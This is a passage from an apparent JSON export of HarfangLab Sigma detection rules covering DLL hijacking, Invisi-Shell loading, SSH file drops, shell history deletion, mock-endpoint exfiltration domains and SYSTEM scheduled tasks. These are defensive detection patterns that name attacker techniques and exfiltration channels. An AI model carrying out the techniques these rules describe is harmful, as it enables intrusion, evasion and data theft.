"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_timeout.yml",
"content": "title: DLL Hijacking via timeout.exe\nid: 4ef873a0-9d40-4498-85a3-d1610a041785\ndescription: |\n Detects potential Windows DLL Hijacking via timeout.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'timeout.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4ef873a0-9d40-4498-85a3-d1610a041785",
"rule_name": "DLL Hijacking via timeout.exe",
"rule_description": "Detects potential Windows DLL Hijacking via timeout.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4f0c19f4-076d-45e7-a2fc-983031de6c3b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082635Z",
"creation_date": "2026-03-23T11:45:34.082637Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082642Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/OmerYa/Invisi-Shell",
"https://attack.mitre.org/techniques/T1574/012/"
],
"name": "t1574_012_invisishell_dll_loaded.yml",
"content": "title: Invisi-Shell DLL Loaded\nid: 4f0c19f4-076d-45e7-a2fc-983031de6c3b\ndescription: |\n Detects the loading of the Invisi-Shell DLL.\n Invisi-Shell is a tool allowing attackers, through a COR Profiler and .NET assemblies hooking, to bypass all PowerShell security features including logging, ScriptBlock, AMSI, etc.\n It is recommended to verify the legitimacy of the loaded DLL and to analyze the execution context to look for malicious actions.\nreferences:\n - https://github.com/OmerYa/Invisi-Shell\n - https://attack.mitre.org/techniques/T1574/012/\ndate: 2020/10/11\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1574.012\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.HackTool.Invisi-Shell\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\InvisiShellProfiler.dll'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4f0c19f4-076d-45e7-a2fc-983031de6c3b",
"rule_name": "Invisi-Shell DLL Loaded",
"rule_description": "Detects the loading of the Invisi-Shell DLL.\nInvisi-Shell is a tool allowing attackers, through a COR Profiler and .NET assemblies hooking, to bypass all PowerShell security features including logging, ScriptBlock, AMSI, etc.\nIt is recommended to verify the legitimacy of the loaded DLL and to analyze the execution context to look for malicious actions.\n",
"rule_creation_date": "2020-10-11",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1574.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4f4d048d-3d6e-4acf-8523-692f7e0619b4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619152Z",
"creation_date": "2026-03-23T11:45:34.619154Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619159Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_clipup.yml",
"content": "title: DLL Hijacking via clipup.exe\nid: 4f4d048d-3d6e-4acf-8523-692f7e0619b4\ndescription: |\n Detects potential Windows DLL Hijacking via clipup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'clipup.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n ImageLoaded|endswith:\n - '\\CRYPTXML.dll'\n - '\\webservices.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4f4d048d-3d6e-4acf-8523-692f7e0619b4",
"rule_name": "DLL Hijacking via clipup.exe",
"rule_description": "Detects potential Windows DLL Hijacking via clipup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4f7f72d0-446d-4b85-9c35-0feebc738c90",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613050Z",
"creation_date": "2026-03-23T11:45:34.613053Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613061Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1133/",
"https://attack.mitre.org/techniques/T1021/004/"
],
"name": "t1105_remote_file_copied_to_suspicious_path_via_ssh.yml",
"content": "title: Remote File Copied via SSH to Suspicious Directory\nid: 4f7f72d0-446d-4b85-9c35-0feebc738c90\ndescription: |\n Detects the copy of a file to a suspicious or unusual directory from a remote host using SSH or one of its utilities (like scp).\n Adversaries may transfer tools or other files from an external system into a compromised environment as part of their malicious activity.\n It is recommended to investigate the context of this action to determine its legitimacy and to ensure that the file copy is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1133/\n - https://attack.mitre.org/techniques/T1021/004/\ndate: 2024/02/26\nmodified: 2025/06/05\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.persistence\n - attack.initial_access\n - attack.t1133\n - attack.lateral_movement\n - attack.t1021.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Lateralization\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_process:\n ProcessImage|endswith: '/sftp-server'\n\n selection_write:\n Kind: 'access'\n Permissions: 'write'\n\n selection_path:\n # NOTE: `/opt/` and `/usr/share` were left out becase of an unmanageable amount\n # of custom scripts that update assets to those directories.\n Path|startswith:\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n - '/usr/local/'\n - '/lib/'\n - '/lib64/'\n - '/usr/lib/'\n - '/usr/lib64/'\n - '/usr/libexec/'\n - '/usr/share/'\n - '/snap/'\n - '/tmp/'\n - '/var/tmp/'\n\n # Avoids false positives when updating the resources or assets of services\n exclusion_filetype:\n Path|endswith:\n - '.txt'\n - '.txt.filepart'\n - '.png'\n - '.png.filepart'\n - '.jpg'\n - '.jpg.filepart'\n - '.jpeg'\n - '.jpeg.filepart'\n - '.pdf'\n - '.pdf.filepart'\n - '.csv'\n - '.csv.filepart'\n - '.xml'\n - '.xml.filepart'\n - '.svg'\n - '.svg.filepart'\n - '.ttf'\n - '.ttf.filepart'\n - '.ico'\n - '.ico.filepart'\n - '.sql'\n\n # Avoids false positives when updating a website's content\n exclusion_website:\n Path|contains:\n - '/nodejs/'\n - '/node_modules/'\n - '/vendor/'\n - '/locale/'\n - '/assets/'\n - '/application/'\n - '/docs/'\n - '/templates/'\n\n exclusion_ansible:\n Path|contains:\n - '/ansible-tmp-*/*.py'\n - '/ansible-tmp-*/source'\n - '/.ansible-tmp-*/*.py'\n - '/.ansible-tmp-*/source'\n\n exclusion_sudo_bootstrap:\n Path: '/tmp/.sudo_bootstrap????????-????-????-????-????????????.sh'\n\n exclusion_veeam:\n Path:\n - '/tmp/VeeamApp*'\n - '/tmp/VeeamAgent*'\n - '/tmp/vee????????-????-????-????-????????????/.veeamlib.tar'\n\n exclusion_alfresco:\n Path|startswith:\n - '/tmp/recup-ipar-alf/acs/alfresco-content-services-community-distribution-*/alf_data/contentstore/'\n - '/var/tmp/recup-ipar-alf/acs/alfresco-content-services-community-distribution-*/alf_data/contentstore/'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4f7f72d0-446d-4b85-9c35-0feebc738c90",
"rule_name": "Remote File Copied via SSH to Suspicious Directory",
"rule_description": "Detects the copy of a file to a suspicious or unusual directory from a remote host using SSH or one of its utilities (like scp).\nAdversaries may transfer tools or other files from an external system into a compromised environment as part of their malicious activity.\nIt is recommended to investigate the context of this action to determine its legitimacy and to ensure that the file copy is legitimate.\n",
"rule_creation_date": "2024-02-26",
"rule_modified_date": "2025-06-05",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.initial_access",
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1021.004",
"attack.t1105",
"attack.t1133"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4f8964a4-5740-479c-8358-30799f2df2d6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611786Z",
"creation_date": "2026-03-23T11:45:34.611790Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611797Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1070/003/"
],
"name": "t1070_003_shell_history_removed_linux.yml",
"content": "title: Shell History File Removed\nid: 4f8964a4-5740-479c-8358-30799f2df2d6\ndescription: |\n Detects an attempt to remove any of the common shell history files.\n Attackers can try to remove the history file to hide their tracks.\n It is recommended to investigate the process performing the deletion to look for malicious content or actions as well as to look for other suspicious behavior in this user session.\nreferences:\n - https://attack.mitre.org/techniques/T1070/003/\ndate: 2022/11/15\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_path:\n Path|startswith:\n - '/home/'\n - '/root/'\n Path|endswith:\n - '/.history'\n - '/.ash_history'\n - '/.bash_history'\n - '/.tcsh_history'\n - '/.sh_history'\n - '/.zsh_history'\n - '/fish_history'\n\n selection_kind:\n Kind:\n - 'remove'\n - 'rename' # In case the file is moved to the thrash bin\n\n exclusion_docker:\n ProcessImage:\n - '/usr/local/bin/dockerd'\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/snap/docker/*/bin/dockerd'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_plesk:\n ProcessCommandLine|startswith: '/usr/bin/python -Estt /usr/local/psa/bin/yum_install ' # Plesk'\n\n exclusion_delete_user:\n - ProcessImage:\n - '/usr/sbin/luserdel'\n - '/usr/sbin/userdel'\n - ProcessCommandLine: '/usr/bin/perl /usr/sbin/deluser *'\n\n exclusion_gvfs:\n ProcessImage: '/usr/libexec/gvfsd-trash'\n\n exclusion_rsync:\n ProcessImage: '/usr/bin/rsync'\n\n exclusion_ksh:\n ProcessImage: '/usr/bin/ksh93'\n ProcessCommandLine: '-ksh'\n ProcessParentImage:\n - '/usr/bin/su'\n - '/usr/sbin/sshd'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4f8964a4-5740-479c-8358-30799f2df2d6",
"rule_name": "Shell History File Removed",
"rule_description": "Detects an attempt to remove any of the common shell history files.\nAttackers can try to remove the history file to hide their tracks.\nIt is recommended to investigate the process performing the deletion to look for malicious content or actions as well as to look for other suspicious behavior in this user session.\n",
"rule_creation_date": "2022-11-15",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4fc22311-870c-4261-885e-2d7e461df964",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096119Z",
"creation_date": "2026-03-23T11:45:34.096122Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096128Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims",
"https://www.contextis.com/en/blog/dll-search-order-hijacking",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_hp_imaging.yml",
"content": "title: DLL Hijacking via HP Imaging Software\nid: 4fc22311-870c-4261-885e-2d7e461df964\ndescription: |\n Detects potential Windows DLL Hijacking via HP Imaging Software.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims\n - https://www.contextis.com/en/blog/dll-search-order-hijacking\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'EWSProxy.Exe'\n ProcessSignature: 'Hewlett Packard'\n ImageLoaded|endswith: '\\ScanImageui.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\HP\\Digital Imaging\\bin\\'\n - '?:\\Program Files (x86)\\HP\\Digital Imaging\\bin\\'\n - '?:\\Program Files\\HP\\HP Scan Extended\\bin\\'\n - '?:\\Program Files (x86)\\HP\\HP Scan Extended\\bin\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\HP\\Digital Imaging\\bin\\'\n - '?:\\Program Files (x86)\\HP\\Digital Imaging\\bin\\'\n - '?:\\Program Files\\HP\\HP Scan Extended\\bin\\'\n - '?:\\Program Files (x86)\\HP\\HP Scan Extended\\bin\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Hewlett Packard'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4fc22311-870c-4261-885e-2d7e461df964",
"rule_name": "DLL Hijacking via HP Imaging Software",
"rule_description": "Detects potential Windows DLL Hijacking via HP Imaging Software.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4fd851cb-ec8d-4cc6-ae02-1405584f3b23",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625346Z",
"creation_date": "2026-03-23T11:45:34.625348Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625353Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/@simone.kraus/critical-engergy-infrastructure-facility-in-ukraine-attack-b15638f6a402",
"https://www.zscaler.com/blogs/security-research/steal-it-campaign",
"https://attack.mitre.org/techniques/T1567/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1567_mock_endpoint_dns_request.yml",
"content": "title: DNS Resolution of a Mock Endpoint\nid: 4fd851cb-ec8d-4cc6-ae02-1405584f3b23\ndescription: |\n Detects a DNS resolution request of a mock endpoint service such as Mockbin.\n Mock endpoint services allow developers to simulate API responses.\n Attackers can use them to exfiltrate stolen data stealthily, or to host and deliver malicious payloads to infected hosts.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://medium.com/@simone.kraus/critical-engergy-infrastructure-facility-in-ukraine-attack-b15638f6a402\n - https://www.zscaler.com/blogs/security-research/steal-it-campaign\n - https://attack.mitre.org/techniques/T1567/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2023/09/07\nmodified: 2025/12/19\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1567\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.FileDownload\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName:\n - 'mockbin.org'\n - 'run.mocky.io'\n\n filter_browser:\n ProcessOriginalFileName:\n - 'firefox.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'librewolf.exe'\n - 'opera.exe'\n - 'vivaldi.exe'\n - 'iexplore.exe'\n - 'msedgewebview2.exe'\n - 'zen.exe'\n\n # https://newtonpaul.com/svchost-analysis-and-internet-sharing-triage/\n exclusion_sharedaccess:\n ProcessCommandLine: '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s SharedAccess'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_mcafee:\n ProcessImage: '?:\\Program Files\\McAfee\\Endpoint Security\\Adaptive Threat Protection\\mfeatp.exe'\n\n exclusion_cybereason:\n ProcessImage: '?:\\Program Files\\Cybereason ActiveProbe\\minionhost.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Cybereason Inc'\n - 'Cybereason Inc.'\n - 'Cybereason, Inc'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4fd851cb-ec8d-4cc6-ae02-1405584f3b23",
"rule_name": "DNS Resolution of a Mock Endpoint",
"rule_description": "Detects a DNS resolution request of a mock endpoint service such as Mockbin.\nMock endpoint services allow developers to simulate API responses.\nAttackers can use them to exfiltrate stolen data stealthily, or to host and deliver malicious payloads to infected hosts.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2023-09-07",
"rule_modified_date": "2025-12-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1567"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5043ae9d-7660-4103-8092-bd964e56e775",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092199Z",
"creation_date": "2026-03-23T11:45:34.092201Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092205Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_005_system_scheduled_task.yml",
"content": "title: System Scheduled Task Created\nid: 5043ae9d-7660-4103-8092-bd964e56e775\ndescription: |\n Detects the creation of a Scheduled Task that is set to run by the SYSTEM user.\n The Task Scheduler Service in Windows is used to create and execute Scheduled Tasks, which can be used to launch programs, send emails or calling COM objects according to different triggers.\n Scheduled Tasks can be used by attackers to set up persistence, having a Scheduled Task run as system could potentially indicate persistence and give an attacker the highest privileges on the local machine.\n It is recommended to determine whether this is part of a persistence mechanism or normal endpoint/software behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2021/10/11\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\schtasks.exe'\n - OriginalFileName: 'schtasks.exe'\n selection_2:\n - CommandLine|contains: '/create '\n # We can't simply match against \"SYSTEM\" as it might be part of a path (C:\\Windows\\System32\\)\n # so we ensure it's either at the very end of the command line, or it is followed by a white space.\n selection_3:\n - CommandLine|endswith: '/ru*SYSTEM'\n - 